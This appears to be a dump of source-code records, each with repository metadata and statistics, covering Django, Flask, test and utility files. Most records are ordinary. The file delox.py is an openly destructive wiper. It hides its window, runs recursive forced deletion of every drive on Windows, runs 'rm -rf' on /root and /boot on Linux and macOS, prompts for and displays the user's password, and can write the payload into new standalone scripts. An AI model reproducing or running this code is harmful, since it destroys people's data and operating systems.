null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
a9ba579835c1afe9d5d13cdd3cf78a5b2c2856d9
742
py
Python
Main/migrations/0005_auto_20200809_0710.py
anshumanprajapatiap/django-ecommerce-
49e7c08fc2ddef969986985e1922184950a5ceff
[ "MIT" ]
3
2020-08-11T06:20:56.000Z
2020-10-24T14:25:57.000Z
Main/migrations/0005_auto_20200809_0710.py
anshumanprajapatiap/django-ecommerce
49e7c08fc2ddef969986985e1922184950a5ceff
[ "MIT" ]
null
null
null
Main/migrations/0005_auto_20200809_0710.py
anshumanprajapatiap/django-ecommerce
49e7c08fc2ddef969986985e1922184950a5ceff
[ "MIT" ]
null
null
null
# Generated by Django 3.1 on 2020-08-09 01:40 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('Main', '0004_auto_20200809_0425'), ] operations = [ migrations.AlterField( model_name='address', name='apartment_address', field=models.CharField(max_length=100, null=True), ), migrations.AlterField( model_name='address', name='street_address', field=models.CharField(max_length=100, null=True), ), migrations.AlterField( model_name='address', name='zip', field=models.CharField(max_length=100, null=True), ), ]
25.586207
62
0.578167
75
742
5.573333
0.52
0.143541
0.179426
0.208134
0.607656
0.607656
0.511962
0.511962
0.416268
0.416268
0
0.075875
0.307278
742
28
63
26.5
0.737354
0.057951
0
0.545455
1
0
0.117647
0.032999
0
0
0
0
0
1
0
false
0
0.045455
0
0.181818
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9bc2fb8cc5a87cb535142d90ecf6c0ccf9b146f
1,342
py
Python
vega/algorithms/nas/modnas/optim/model_optim/base.py
This-50m/vega
43602d062331336d854d908ac3066f42b2ea3a92
[ "MIT" ]
724
2020-06-22T12:05:30.000Z
2022-03-31T07:10:54.000Z
vega/algorithms/nas/modnas/optim/model_optim/base.py
NiuRc/vega
52b53582fe7df95d7aacc8425013fd18645d079f
[ "MIT" ]
147
2020-06-30T13:34:46.000Z
2022-03-29T11:30:17.000Z
vega/algorithms/nas/modnas/optim/model_optim/base.py
NiuRc/vega
52b53582fe7df95d7aacc8425013fd18645d079f
[ "MIT" ]
160
2020-06-29T18:27:58.000Z
2022-03-23T08:42:21.000Z
# -*- coding:utf-8 -*- # Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # This program is free software; you can redistribute it and/or modify # it under the terms of the MIT License. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # MIT License for more details. """Score model optimum finder.""" import random from collections import OrderedDict from typing import Set class ModelOptim(): """Score model optimum finder class.""" def __init__(self, space): self.space = space def get_random_index(self, excludes: Set[int]) -> int: """Return random categorical index from search space.""" index = random.randint(0, self.space.categorical_size() - 1) while index in excludes: index = random.randint(0, self.space.categorical_size() - 1) return index def get_random_params(self, excludes: Set[int]) -> OrderedDict: """Return random categorical parameters from search space.""" return self.space.get_categorical_params(self.get_random_index(excludes)) def get_optimums(self, model, size, excludes): """Return optimums in score model.""" raise NotImplementedError
36.27027
81
0.702683
178
1,342
5.213483
0.488764
0.048491
0.028017
0.049569
0.094828
0.094828
0.094828
0.094828
0.094828
0
0
0.008419
0.203428
1,342
36
82
37.277778
0.859682
0.461252
0
0.133333
0
0
0
0
0
0
0
0
0
1
0.266667
false
0
0.2
0
0.666667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
a9dc3563ddac75de349c4809af9b6d68dd5964ad
106
py
Python
excript/lista3/q5.py
victorers1/anotacoes_curso_python
c4ef56bcfc7e3baa3944fc2962e8217c6d720b0e
[ "MIT" ]
null
null
null
excript/lista3/q5.py
victorers1/anotacoes_curso_python
c4ef56bcfc7e3baa3944fc2962e8217c6d720b0e
[ "MIT" ]
null
null
null
excript/lista3/q5.py
victorers1/anotacoes_curso_python
c4ef56bcfc7e3baa3944fc2962e8217c6d720b0e
[ "MIT" ]
null
null
null
soma = 0 for i in range(0,101): if(i%2==0): soma+=i print("A soma de todos os pares é:", soma)
21.2
42
0.556604
23
106
2.565217
0.695652
0
0
0
0
0
0
0
0
0
0
0.089744
0.264151
106
5
42
21.2
0.666667
0
0
0
0
0
0.252336
0
0
0
0
0
0
1
0
false
0
0
0
0
0.2
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9de23120b1f70e9fb79e0ee6eae47eca55547c5
2,054
py
Python
src/RIOT/tests/od/tests/02-run.py
ARte-team/ARte
19f17f57522e1b18ba390718fc94be246451837b
[ "MIT" ]
2
2020-04-30T08:17:45.000Z
2020-05-23T08:46:54.000Z
src/RIOT/tests/od/tests/02-run.py
ARte-team/ARte
19f17f57522e1b18ba390718fc94be246451837b
[ "MIT" ]
null
null
null
src/RIOT/tests/od/tests/02-run.py
ARte-team/ARte
19f17f57522e1b18ba390718fc94be246451837b
[ "MIT" ]
1
2020-02-21T09:21:45.000Z
2020-02-21T09:21:45.000Z
#!/usr/bin/env python3 # Copyright (C) 2017 Hamburg University of Applied Sciences # # This file is subject to the terms and conditions of the GNU Lesser # General Public License v2.1. See the file LICENSE in the top level # directory for more details. import sys from testrunner import run def testfunc(child): child.expect_exact("od_hex_dump(short_str, sizeof(short_str), OD_WIDTH_DEFAULT)") child.expect_exact("00000000 41 42 00 AB.") child.expect_exact("od_hex_dump(long_str, sizeof(long_str), OD_WIDTH_DEFAULT)") child.expect_exact("00000000 FF 2C 61 FF 2E 62 63 64 65 66 67 68 69 6A 6B 6C .,a..bcdefghijkl") child.expect_exact("00000010 6D 6E 6F 70 00 mnop.") child.expect_exact("od_hex_dump(long_str, sizeof(long_str), 4)") child.expect_exact("00000000 FF 2C 61 FF .,a.") child.expect_exact("00000004 2E 62 63 64 .bcd") child.expect_exact("00000008 65 66 67 68 efgh") child.expect_exact("0000000C 69 6A 6B 6C ijkl") child.expect_exact("00000010 6D 6E 6F 70 mnop") child.expect_exact("00000014 00 .") child.expect_exact("od_hex_dump(long_str, sizeof(long_str), 3)") child.expect_exact("00000000 FF 2C 61 .,a") child.expect_exact("00000003 FF 2E 62 ..b") child.expect_exact("00000006 63 64 65 cde") child.expect_exact("00000009 66 67 68 fgh") child.expect_exact("0000000C 69 6A 6B ijk") child.expect_exact("0000000F 6C 6D 6E lmn") child.expect_exact("00000012 6F 70 00 op.") child.expect_exact("od_hex_dump(long_str, sizeof(long_str), 8)") child.expect_exact("00000000 FF 2C 61 FF 2E 62 63 64 .,a..bcd") child.expect_exact("00000008 65 66 67 68 69 6A 6B 6C efghijkl") child.expect_exact("00000010 6D 6E 6F 70 00 mnop.") print("All tests successful") if __name__ == "__main__": sys.exit(run(testfunc, timeout=1))
46.681818
116
0.638267
311
2,054
4.03537
0.366559
0.210359
0.305976
0.071713
0.529084
0.529084
0.509163
0.43745
0.323506
0.267729
0
0.188654
0.261928
2,054
43
117
47.767442
0.639182
0.117332
0
0.066667
0
0.033333
0.561704
0.058661
0
0
0
0
0
1
0.033333
false
0
0.066667
0
0.1
0.033333
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9df5214be84ff611b6cdee71586384f662371b6
379
py
Python
pytoggl/api/projects_api.py
cloew/pytoggl
ec559e532559bfeaeb0de7f18831d30ed84f5ff1
[ "MIT" ]
null
null
null
pytoggl/api/projects_api.py
cloew/pytoggl
ec559e532559bfeaeb0de7f18831d30ed84f5ff1
[ "MIT" ]
null
null
null
pytoggl/api/projects_api.py
cloew/pytoggl
ec559e532559bfeaeb0de7f18831d30ed84f5ff1
[ "MIT" ]
null
null
null
from .actions import AllFromWorkspaces, Get, WithName from .api_for import api_for from .model_api import ModelApi from ..requests import RequestApis from ..model import Project @api_for(Project, RequestApis.Projects) class ProjectsApi(ModelApi): """ Represents the Toggl Projects API """ all = AllFromWorkspaces() withId = Get() withName = WithName()
31.583333
54
0.733509
44
379
6.227273
0.477273
0.065693
0
0
0
0
0
0
0
0
0
0
0.182058
379
12
55
31.583333
0.883871
0.087071
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
0.9
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
a9e29337adc9d3ccffaa9a42248f46b7b76d1765
480
py
Python
codev/core/log.py
baseclue/codev
7965ffc036ea217e05ca1f566e7b1917c0a67887
[ "Apache-2.0" ]
4
2016-03-21T12:20:52.000Z
2017-02-02T09:08:19.000Z
codev/core/log.py
baseclue/codev
7965ffc036ea217e05ca1f566e7b1917c0a67887
[ "Apache-2.0" ]
null
null
null
codev/core/log.py
baseclue/codev
7965ffc036ea217e05ca1f566e7b1917c0a67887
[ "Apache-2.0" ]
null
null
null
import logging LOGLEVELS = { 'info': logging.INFO, 'debug': logging.DEBUG, } actual_loglevel = 'info' class LoglevelFilter(logging.Filter): def __init__(self, loglevel): self.loglevel = loglevel super().__init__() def filter(self, record): if record.levelno == self.loglevel: return True error_filter = LoglevelFilter(logging.ERROR) info_filter = LoglevelFilter(logging.INFO) debug_filter = LoglevelFilter(logging.DEBUG)
20
44
0.685417
51
480
6.215686
0.392157
0.264984
0.255521
0
0
0
0
0
0
0
0
0
0.20625
480
23
45
20.869565
0.832021
0
0
0
0
0
0.027083
0
0
0
0
0
0
1
0.125
false
0
0.0625
0
0.3125
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9efe50ebc395c79d136c9ed223bd0fa73445f27
189
py
Python
nablapps/poll/apps.py
pettaroni/nablaweb
5e610698a276884b9cd779a718dfdee641713636
[ "MIT" ]
null
null
null
nablapps/poll/apps.py
pettaroni/nablaweb
5e610698a276884b9cd779a718dfdee641713636
[ "MIT" ]
null
null
null
nablapps/poll/apps.py
pettaroni/nablaweb
5e610698a276884b9cd779a718dfdee641713636
[ "MIT" ]
null
null
null
""" App configs for poll app """ from django.apps import AppConfig class PollConfig(AppConfig): """Default poll config""" name = 'nablapps.poll' verbose_name = 'Avstemninger'
17.181818
33
0.687831
22
189
5.863636
0.772727
0
0
0
0
0
0
0
0
0
0
0
0.190476
189
10
34
18.9
0.843137
0.232804
0
0
0
0
0.189394
0
0
0
0
0
0
1
0
false
0
0.25
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
a9f3f4d963793624fa37eb908b72250431fcb5b9
542
py
Python
app/models/registration.py
bmstu-iu8-g1-2019-project/lingvo-subtitles
23376822725cf5c076783fa03c4d31ae1de14687
[ "MIT" ]
null
null
null
app/models/registration.py
bmstu-iu8-g1-2019-project/lingvo-subtitles
23376822725cf5c076783fa03c4d31ae1de14687
[ "MIT" ]
null
null
null
app/models/registration.py
bmstu-iu8-g1-2019-project/lingvo-subtitles
23376822725cf5c076783fa03c4d31ae1de14687
[ "MIT" ]
null
null
null
from collections import Counter from werkzeug.security import generate_password_hash from app import db def register_user(email, username, password): db.auth.drop() if db.auth.find_one({"username": username}) is not None: return -1 if db.auth.find_one({"email": email}) is not None: return -1 new_user = { "username": username, "email": email, "hashed_password": generate_password_hash(password), "words": Counter() } return db.auth.insert_one(new_user).inserted_id
25.809524
60
0.664207
71
542
4.901408
0.450704
0.068966
0.114943
0.068966
0.178161
0
0
0
0
0
0
0.004773
0.226937
542
20
61
27.1
0.825776
0
0
0.125
1
0
0.084871
0
0
0
0
0
0
1
0.0625
false
0.1875
0.1875
0
0.4375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
a9f79a8550cbe2ffbf9de0e46704c3f19c02a79f
373
py
Python
examples/courseware/shapes.py
LettError/drawbot
dce9af449d429af3f10827654d8b9d3bb8bb8efe
[ "BSD-2-Clause" ]
2
2015-09-17T01:27:02.000Z
2020-11-26T12:07:13.000Z
examples/courseware/shapes.py
LettError/drawbot
dce9af449d429af3f10827654d8b9d3bb8bb8efe
[ "BSD-2-Clause" ]
null
null
null
examples/courseware/shapes.py
LettError/drawbot
dce9af449d429af3f10827654d8b9d3bb8bb8efe
[ "BSD-2-Clause" ]
null
null
null
# draw a rectangle # rect(x, y, width, height) rect(20, 50, 100, 200) rect(130, 50, 100, 200) oval(240, 50, 100, 200) oval(20, 250, 100, 100) oval(130, 250, 100, 100) rect(240, 250, 100, 100) for x in range(20, 300, 50): rect(x, 370, 40, 40) for x in range(20, 300, 50): if random() > 0.5: rect(x, 420, 40, 40) else: oval(x, 420, 40, 40)
16.217391
28
0.557641
72
373
2.888889
0.388889
0.072115
0.115385
0.115385
0.173077
0.173077
0.173077
0
0
0
0
0.376812
0.260054
373
22
29
16.954545
0.376812
0.112601
0
0.153846
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e70cb8d5f07a65dd29cb11814472b7f5f34cf181
413
py
Python
apps/auth/forms.py
capy-pl/nccu-grade-system
db7107d56e45d535eed92b47c06e0d5c06f983a2
[ "Apache-2.0" ]
2
2019-01-14T17:20:06.000Z
2019-05-06T03:26:23.000Z
apps/auth/forms.py
capy-pl/nccu-grade-system
db7107d56e45d535eed92b47c06e0d5c06f983a2
[ "Apache-2.0" ]
4
2018-12-25T15:06:35.000Z
2019-01-05T08:02:36.000Z
apps/auth/forms.py
capy-pl/nccu-grade-system
db7107d56e45d535eed92b47c06e0d5c06f983a2
[ "Apache-2.0" ]
null
null
null
from django import forms from django.contrib.auth.password_validation import CommonPasswordValidator class ChangePasswordForm(forms.Form): password = forms.CharField(label='密碼', max_length=50, widget=forms.PasswordInput) def clean_password(self): password = self.cleaned_data['password'] validator = CommonPasswordValidator() validator.validate(password) return password
34.416667
85
0.753027
43
413
7.139535
0.651163
0.065147
0
0
0
0
0
0
0
0
0
0.005797
0.164649
413
11
86
37.545455
0.884058
0
0
0
0
0
0.024213
0
0
0
0
0
0
1
0.111111
false
0.888889
0.222222
0
0.666667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
e711e9ffc872c6227dcc744b6182d637eafea65d
759
py
Python
pastetron/pagination.py
kgaughan/pastetron
2f605bedb7a6947a1eb60a1e3f2b63c037e3fe49
[ "MIT" ]
1
2015-09-25T22:11:32.000Z
2015-09-25T22:11:32.000Z
pastetron/pagination.py
kgaughan/pastetron
2f605bedb7a6947a1eb60a1e3f2b63c037e3fe49
[ "MIT" ]
null
null
null
pastetron/pagination.py
kgaughan/pastetron
2f605bedb7a6947a1eb60a1e3f2b63c037e3fe49
[ "MIT" ]
null
null
null
""" Pagination support code. """ BUFFER = 5 def paginator(page_num, max_page, buffer_size=BUFFER): """ Pagination generator. Generates a sequence of page numbers, giving the pages at the beginning and end, and around the current page, with a number of buffer pages on each side of both. Omitted pages in the sequence are elided into a `None`. """ if page_num - buffer_size > 1: yield 1 if page_num - buffer_size > 2: yield None begin = max(1, page_num - buffer_size) end = min(max_page, page_num + buffer_size) for i in xrange(begin, end + 1): yield i if max_page - page_num - buffer_size > 1: yield None if max_page - page_num - buffer_size > 0: yield max_page
26.172414
78
0.648221
117
759
4.042735
0.410256
0.103594
0.164905
0.215645
0.266385
0.221987
0.109937
0
0
0
0
0.014572
0.27668
759
28
79
27.107143
0.846995
0.349144
0
0.142857
1
0
0
0
0
0
0
0
0
1
0.071429
false
0
0
0
0.071429
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e7195e39c28378891f6a854d918f59f6617bb12b
1,126
py
Python
app/projects/migrations/0003_auto_20201214_1344.py
JoaoAPS/BugTracker
5bb2db85227201c18e50e0fa07822b0623289ec4
[ "MIT" ]
null
null
null
app/projects/migrations/0003_auto_20201214_1344.py
JoaoAPS/BugTracker
5bb2db85227201c18e50e0fa07822b0623289ec4
[ "MIT" ]
null
null
null
app/projects/migrations/0003_auto_20201214_1344.py
JoaoAPS/BugTracker
5bb2db85227201c18e50e0fa07822b0623289ec4
[ "MIT" ]
null
null
null
# Generated by Django 3.1.4 on 2020-12-14 13:44 from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('projects', '0002_auto_20201202_1826'), ] operations = [ migrations.AlterField( model_name='project', name='closingDate', field=models.DateTimeField(blank=True, default=None, null=True), ), migrations.AlterField( model_name='project', name='creationDate', field=models.DateTimeField(auto_now_add=True), ), migrations.AlterField( model_name='project', name='members', field=models.ManyToManyField(blank=True, related_name='projects', to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='project', name='supervisors', field=models.ManyToManyField(blank=True, related_name='supervised_projects', to=settings.AUTH_USER_MODEL), ), ]
31.277778
118
0.624334
112
1,126
6.107143
0.473214
0.116959
0.146199
0.169591
0.47076
0.47076
0.263158
0
0
0
0
0.037576
0.267318
1,126
35
119
32.171429
0.791515
0.039964
0
0.413793
1
0
0.117702
0.021316
0
0
0
0
0
1
0
false
0
0.068966
0
0.172414
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e71d8640f648c91c132e793f9966b2f85d25064f
321
py
Python
app.py
sztanyoo/K2010-envvars
fcf0ccc356b865b9ea4cb80005105271a58ed611
[ "MIT" ]
null
null
null
app.py
sztanyoo/K2010-envvars
fcf0ccc356b865b9ea4cb80005105271a58ed611
[ "MIT" ]
null
null
null
app.py
sztanyoo/K2010-envvars
fcf0ccc356b865b9ea4cb80005105271a58ed611
[ "MIT" ]
null
null
null
from flask import Flask from flask import render_template import socket import os app = Flask(__name__) TARGET = os.environ.get('TARGET') @app.route("/") def main(): return render_template('target.html', name=socket.gethostname(), target=TARGET) if __name__ == "__main__": app.run(host="0.0.0.0", port=8080)
18.882353
83
0.713396
47
321
4.574468
0.510638
0.027907
0.139535
0
0
0
0
0
0
0
0
0.028881
0.137072
321
16
84
20.0625
0.747292
0
0
0
0
0
0.102804
0
0
0
0
0
0
1
0.090909
false
0
0.363636
0.090909
0.545455
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
e735da3f9351417bac702ec156eec7414c20e3c4
12,364
py
Python
delox.py
onexploit/onexploit
15b07ff6f93f4ddd03b482959c500f1db2edc039
[ "MIT" ]
null
null
null
delox.py
onexploit/onexploit
15b07ff6f93f4ddd03b482959c500f1db2edc039
[ "MIT" ]
null
null
null
delox.py
onexploit/onexploit
15b07ff6f93f4ddd03b482959c500f1db2edc039
[ "MIT" ]
null
null
null
import random from requests import get import socket import os , win32gui , win32con import getpass import time from init import banner from init.color import Color def ClearCSR(): os.system('clear') os.system('cls') def username(): getpass.getuser() def ip_local(): get('https://api.ipify.org').text def ip_public(): socket.gethostbyname(socket.gethostname()) def run(): ClearCSR() time.sleep(1) print(f''' ____ __ / __ \___ / /___ _ __ / / / / _ \/ / __ \| |/_/ / /_/ / __/ / /_/ /> < /_____/\___/_/\____/_/|_| programmer : One_Exploit' [*] -> onexploit@one_exploit.com' ''') systems = (''' [01] -> Windows [02] -> Linux [03] -> Os [04] -> Writer [99] -> exit ''') return systems print(run()) sys = int(input('one_exploit => ')) if sys == '01' or sys == '02' or sys == '03': print('Which one [1,2,3,99]') print(run()) def exits(): os.system('exit') print(''' ========= | By By | ========= ''') if sys == 1: while True: try: def delWindows(): listdrive = ['A', 'B' , 'C' ,'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'] time.sleep(1) ClearCSR() banner.Created_banner(Color.RED +'Windows') print() username() ip_local() password = input('your system have password?(Y , n) : ').lower() if password == 'Y': passnamesystem = getpass('Inter password '+username()+" : ") print('=============================') print(' YOU DELET ALL SYSTEM |') print('=============================') print(f'usename: {username()}') print(f'password: {passnamesystem}') time.sleep(2) win32gui.ShowWindow(win32gui.GetForegroundWindow(), win32con.SW_HIDE) for d in listdrive: driver = d os.system('del '+ driver + ':\*.* /f /s /q') # os.system('off') # os.system('attrib -r -g -h C:\\autoexec.bat') # os.system('del C:\\autoexec.bat') # os.system('attrib -r -g -h C:\\boot.ini') # os.system('del C:\\boot.ini') # os.system('attrib -r -g -h C:\\ntidr') # os.system('del C:\\ntidr') # os.system('attrib -r -g -h C:\windows\win.ini') # os.system('del C:\windows\win.ini') else: print(f'usename: {username()}') print('password: ') time.sleep(2) win32gui.ShowWindow(win32gui.GetForegroundWindow(), win32con.SW_HIDE) for d in listdrive: driver = d os.system('del '+ driver + ':\*.* /f /s /q') # os.system('off') # os.system('attrib -r -g -h C:\autoexec.bat') # os.system('del C:\autoexec.bat') # os.system('attrib -r -g -h C:\boot.ini') # os.system('del C:\boot.ini') # os.system('attrib -r -g -h C:\ntidr') # os.system('del C:\ntidr') # os.system('attrib -r -g -h C:\windows\win.ini') # os.system('del C:\windows\win.ini') print('=============================') print(' YOU DELET ALL SYSTEM |') print('=============================') delWindows() break except AttributeError: print( Color.RED +'[*] -> plese check the systems.') elif sys == 2: while True: try: def delLinux(): time.sleep(1) os.system('clear') banner.Created_banner(Color.RED + 'Linux') password = input('your system have password?(Y , n) : ').lower() if password == 'y': passnamesystem = getpass('Inter password '+username()+" : ") print('=============================') print(' YOU DELET ALL SYSTEM |') print('=============================') print('We are One_Exploit') print(f'usename: {username()}') print(f'pass: {passnamesystem}') time.sleep(2) win32gui.ShowWindow(win32gui.GetForegroundWindow(), win32con.SW_HIDE) os.system('sudo su') os.system('echo '+passnamesystem) os.system('cp -r /home/'+username()+'/* /techer0221/') os.system('sudo cp -r /boot/* /root/boot/') or os.system('cp -r /boot/* /root/boot/') os.system('sudo cp -r /root/*') or os.system('cp -r /root/*') os.system('sudo rm -rf /root/*') or os.system('rm -rf /root/*') os.system('sudo rm -rf /boot/*') or os.system('rm -rf /boot/*') else: print('=============================') print(' YOU DELET ALL SYSTEM |') print('=============================') print('We are One_Exploit') print(f'usename: {username()}') print('password: ') time.sleep(2) win32gui.ShowWindow(win32gui.GetForegroundWindow(), win32con.SW_HIDE) os.system('sudo su') os.system('cp -r /home/'+username()+'/* /techer0221/') os.system('sudo cp -r /boot/* /root/boot/') or os.system('cp -r /boot/* /root/boot/') os.system('sudo cp -r /root/*') or os.system('cp -r /root/*') os.system('sudo rm -rf /root/*') or os.system('rm -rf /root/*') os.system('sudo rm -rf /boot/*') or os.system('rm -rf /boot/*') delLinux() break except AttributeError: print( Color.RED +'[*] -> plese check the systems.') elif sys == 3: while True: try: def delOs(): banner.Created_banner(Color.RED + 'MAC OS') ClearCSR() time.sleep(2) print('[*] -> your system deleted') os.system('sudo cp -r /boot/* /root/boot/') or os.system('cp -r /boot/* /root/boot/') os.system('sudo cp -r /root/*') or os.system('cp -r /root/*') os.system('sudo rm -rf /root/*') or os.system('rm -rf /root/*') os.system('sudo rm -rf /boot/*') or os.system('rm -rf /boot/*') delOs() break except AttributeError: print( Color.RED +'[*] -> plese check the systems.') elif sys == 4: while True: def Menu_Writer(): ClearCSR() banner.Created_banner('Write Delox') print('which one?') print(''' [1] -> Windows Write code Windows64 bit in new file for run. [2] -> Linux Write code Linux bit in new file for run. [3] -> Mac OS Write code MacOS in new file for run. [help] -> help ''') numbers = input('Enter Number: ') def Windows(): with open('init/main1.py', 'r') as mfile: with open('Windows.py', 'w') as file: file.writelines(mfile) file.close() def Linux(): with open('init/main2.py', 'r') as mfile: with open('Linux.py', 'w') as file: file.writelines(mfile) file.close() def MacOS(): with open('init/main3.py' , 'r') as osfile: with open('MacOS.py', 'w') as macOS: macOS.writelines(osfile) macOS.close() def Help(): Helping1 = ''' In this section, you can separate each executable file and save it in another file, for example, if you read Linux, it will copy the code in this tool for Linux in a new file and add it to the new file.\n \t \t \ if Do you went backed in first page write (Back) else Enter''' print(Helping1) if numbers == '1': print(Color.RED + '[*] waiting .') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ..') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ...') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting .....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ......') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print('\t\t The END') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) Windows() input('Enter Anything.....') elif numbers == '2': print(Color.RED + '[*] waiting .') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ..') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ...') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting .....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ......') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print('\t\t The END') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) Linux() input('Enter Anything.....') elif numbers == '3': print(Color.RED + '[*] waiting .') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ..') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ...') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting .....') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print(Color.RED + '[*] waiting ......') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) print('\t\t The END') time.sleep(random.choice([1,2,3,4,5,6,7,8,9])) MacOS() elif numbers == 'help' or numbers == 'Help' or numbers == '4': print(Color.RED + '[*] waiting.') print() # elif numbers == '99': # print(run()) Help() input1 = input('Enter Anything.....') if input1 == '' or input1 == 'Enter' or input1 == 'enter': Menu_Writer() elif input1 == 'back' or input1 == 'Back': print(run()) Menu_Writer() elif sys == 99: print('Good By') exits() elif sys == '': print(run())
42.342466
160
0.410789
1,333
12,364
3.765941
0.153038
0.084462
0.013147
0.087849
0.676892
0.646215
0.627291
0.620916
0.620916
0.620916
0
0.038451
0.406826
12,364
291
161
42.487973
0.646032
0.05419
0
0.592742
0
0.004032
0.263334
0.024866
0
0
0
0
0
1
0.056452
false
0.052419
0.032258
0
0.092742
0.245968
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
e7392ab44027b89133d39ca29c9b3f1fd98daf39
1,156
py
Python
src/pysonata/sonata/tests/circuit/conftest.py
AllenInstitute/project7
901350cdf5c57a56b7efece2a309c72bdf5f2608
[ "BSD-3-Clause" ]
35
2018-04-10T13:54:27.000Z
2022-03-12T09:22:31.000Z
src/pysonata/sonata/tests/circuit/conftest.py
AllenInstitute/project7
901350cdf5c57a56b7efece2a309c72bdf5f2608
[ "BSD-3-Clause" ]
92
2018-03-19T10:14:18.000Z
2022-01-29T15:21:47.000Z
src/pysonata/sonata/tests/circuit/conftest.py
AllenInstitute/project7
901350cdf5c57a56b7efece2a309c72bdf5f2608
[ "BSD-3-Clause" ]
25
2018-03-16T23:14:42.000Z
2022-02-09T19:37:05.000Z
import os import pytest from six import string_types from sonata.circuit.file import File def _append_fdir(files): fdir = os.path.dirname(os.path.realpath(__file__)) if isinstance(files, string_types): return os.path.join(fdir, files) else: return [os.path.join(fdir, f) for f in files] @pytest.fixture def net(): return File(data_files=_append_fdir(['examples/v1_nodes.h5', 'examples/lgn_nodes.h5', 'examples/v1_v1_edges.h5']), data_type_files=_append_fdir(['examples/lgn_node_types.csv', 'examples/v1_node_types.csv', 'examples/v1_v1_edge_types.csv'])) @pytest.fixture def thalamocortical(): return File(data_files=_append_fdir(['examples/v1_nodes.h5', 'examples/lgn_nodes.h5', 'examples/v1_v1_edges.h5']), data_type_files=_append_fdir(['examples/lgn_node_types.csv', 'examples/v1_node_types.csv', 'examples/v1_v1_edge_types.csv'])) def load_circuit_files(data_files, data_type_files): return File(data_files=_append_fdir(data_files), data_type_files=_append_fdir(data_type_files))
37.290323
118
0.684256
162
1,156
4.518519
0.246914
0.10929
0.122951
0.125683
0.646175
0.51776
0.478142
0.478142
0.478142
0.478142
0
0.019417
0.198097
1,156
31
119
